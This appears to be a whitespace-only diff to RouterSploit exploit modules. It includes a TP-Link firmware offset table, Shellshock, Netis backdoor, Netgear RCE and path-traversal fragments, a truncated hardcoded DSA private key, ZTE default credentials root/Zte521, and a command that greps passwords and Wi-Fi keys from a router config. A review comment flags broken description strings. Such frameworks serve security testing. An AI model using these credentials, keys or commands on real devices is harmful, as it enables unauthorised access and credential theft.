{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21}, # 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17}, # 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1}, # 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5}, # 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1}, # 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25}, # 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21}, # 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9}, # 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20}, # 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17}, # 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5}, # 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17}, # 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1}, # 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17}, # 0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5}, # 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17}, # 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37}, # 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21}, # 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21}, # 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13}, # 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25}, # 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25}, # 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1}, # 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24}, # 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21}, # 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5}, # 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9}, # 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21}, # 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13}, # 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25}, # 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21}, # 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1}, # 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25}, # 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13}, # 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21}, # 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0}, # 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25}, # 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21}, # 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21}, # 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25}, # 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13}, # 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21}, # 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17}, # 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21}, # 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13}, # 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25}, # 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13}, # 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25}, # 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37}, # 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29}, # 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0}, # 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36}, # 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21}, # 0x803db071
],
}
......
......@@ -31,7 +31,7 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/shell-attack-on-your-server-bash-bug-cve-2014-7169-and-cve-2014-6271/',
],
'devices': [
'Multi',
'Multi',
],
}
......@@ -106,7 +106,7 @@ class Exploit(exploits.Exploit):
response = http_request(method=self.method, url=url, headers=headers)
if response is None:
continue
if str(solution) in response.text:
self.valid = payload
return True # target is vulnerable
......
......@@ -147,7 +147,7 @@ class Exploit(exploits.Exploit):
"""
},
{ # loadbalancer.org enterprise va
"user":"root",
"user": "root",
"private_key": """
-----BEGIN DSA PRIVATE KEY-----
MIIBugIBAAKBgQCsCgcOw+DgNR/7g+IbXYdOEwSB3W0o3l1Ep1ibHHvAtLb6AdNW
......
......@@ -85,7 +85,7 @@ class Exploit(exploits.Exploit):
print_error("Target is not vulnerable")
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
......@@ -79,7 +79,7 @@ class Exploit(exploits.Exploit):
print self.execute(s, 7, cmd.strip("\n"))
def execute(self, s, message, payload=""):
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload)+1)
header = struct.pack(self.endianness + 'III', 0x53634D4D, message, len(payload) + 1)
s.send(header + payload + "\x00")
r = s.recv(0xC)
......
......@@ -27,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/',
],
'devices': [
'Netcore',
'Netis',
'Netcore',
'Netis',
],
}
......@@ -65,7 +65,7 @@ class Exploit(exploits.Exploit):
sock.settimeout(10.0)
try:
sock.sendto(payload, (self.target, 53413))
sock.sendto(payload, (self.target, 53413))
response = sock.recv(1024)
except:
pass
......
......@@ -25,15 +25,15 @@ class Exploit(exploits.Exploit):
'http://www.shellshocklabs.com/2015/09/part-1en-hacking-netgear-jwnr2010v5.html',
],
'devices': [
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
'Netgear N300',
'Netgear JNR1010v2',
'Netgear JNR3000',
'Netgear JWNR2000v5',
'Netgear JWNR2010v5',
'Netgear R3250',
'Netgear WNR2020',
'Netgear WNR614',
'Netgear WNR618',
]
}
......
......@@ -19,24 +19,25 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'Netgear ProSafe RCE',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'description': 'Module exploits remote command execution vulnerability in Netgear ProSafe'
'WC9500, WC7600, WC7520 devices. If the target is vulnerable command shell is invoked.',
'authors': [
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'Andrei Costin <andrei[at]firmware.re>', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'http://firmware.re/vulns/acsa-2015-002.php',
'https://www.blackhat.com/docs/asia-16/materials/asia-16-Costin-Automated-Dynamic-Firmware-Analysis-At-Scale-A-Case-Study-On-Embedded-Web-Interfaces.pdf',
],
],
'devices': [
'Netgear ProSafe WC9500',
'Netgear ProSafe WC7600',
'Netgear ProSafe WC7520',
]
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target port') # default port
def run(self):
if self.check():
......@@ -44,7 +45,7 @@ class Exploit(exploits.Exploit):
print_status("Invoking command loop...")
self.command_loop()
else:
print_error("Target is not vulnerable")
print_error("Target is not vulnerable")
def command_loop(self):
while 1:
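Review bot: In the `__info__` hunk of this section the wrapped `'description'` loses a space: the two literals are joined by implicit concatenation, so the text becomes `...in Netgear ProSafeWC9500, WC7600...`; end the first fragment with a space, `'... vulnerability in Netgear ProSafe '`. The same split drops a space in the TP-Link WDR740ND section (`vulnerabilitythat`, and its second fragment also changes `allows to` into `allowsto`) and in the ZTE F609 and ZTE F660 sections (`Disclosure.If`). A formatting-only commit should leave runtime strings byte-identical, which can be confirmed by comparing each joined description with its pre-commit value. The enclosing `Exploit` class begins and ends outside these hunks.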
......
......@@ -17,7 +17,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'TP-Link WDR740ND & WDR740N Path Traversal',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability that allows to read files from the filesystem.',
'description': 'Exploits TP-Link WDR740ND and WDR740N path traversal vulnerability'
'that allowsto read files from the filesystem.',
'authors': [
'websec.ca', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
......@@ -26,8 +27,8 @@ class Exploit(exploits.Exploit):
'http://www.websec.mx/publicacion/advisories/tplink-wdr740-path-traversal',
],
'devices': [
'TP-Link WDR740ND',
'TP-Link WDR740N',
'TP-Link WDR740ND',
'TP-Link WDR740N',
],
}
......
......@@ -103,7 +103,7 @@ class Exploit(exploits.Exploit):
upload_params = {'file': ('../../../../tmp/airview.uavr', tmp_payload, {'Expect': ''})}
response = http_request(url=upload_url, method='POST', files=upload_params)
tmp_payload.close()
if response is None:
......@@ -116,9 +116,9 @@ class Exploit(exploits.Exploit):
# Upload empty file to "clear" the airview.uavr file
clean_tmp_file = tempfile.TemporaryFile()
clean_tmp_file.seek(0)
upload_params = {'file': ('../../../../tmp/airview.uavr', clean_tmp_file, {'Expect': ''})}
http_request(url=upload_url, method='POST', files=upload_params)
clean_tmp_file.close()
......
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F609 Config Disclosure',
'description': 'Module exploits ZTE F609 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F609 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "sendcmd 1 DB p DevAuthInfo"
def run(self):
......
......@@ -16,7 +16,8 @@ class Exploit(exploits.Exploit):
"""
__info__ = {
'name': 'ZTE F660 Config Disclosure',
'description': 'Module exploits ZTE F660 Config Disclosure. If the target is possible to authentiate to the device.',
'description': 'Module exploits ZTE F660 Config Disclosure.'
'If the target is possible to authentiate to the device.',
'authors': [
'devilscream', # vulnerability discovery & routersploit module
],
......@@ -29,8 +30,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
config = "cat /userconfig/cfg/db_user_cfg.xml | grep -E 'UserName|Username|Password|password|ESSID|KeyPhase'"
def run(self):
......
......@@ -31,8 +31,8 @@ class Exploit(exploits.Exploit):
}
target = exploits.Option('', 'Target address e.g. 192.168.1.1') # target address
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
username = exploits.Option("root", "Username to authenticate with") # telnet username, default root
password = exploits.Option("Zte521", "Password to authenticate with") # telnet password, default Zte521
def run(self):
try:
......@@ -59,7 +59,7 @@ class Exploit(exploits.Exploit):
tn.close()
except:
print_error("Connection error {}:{}".format(self.target, self.port))
@mute
def check(self):
try:
......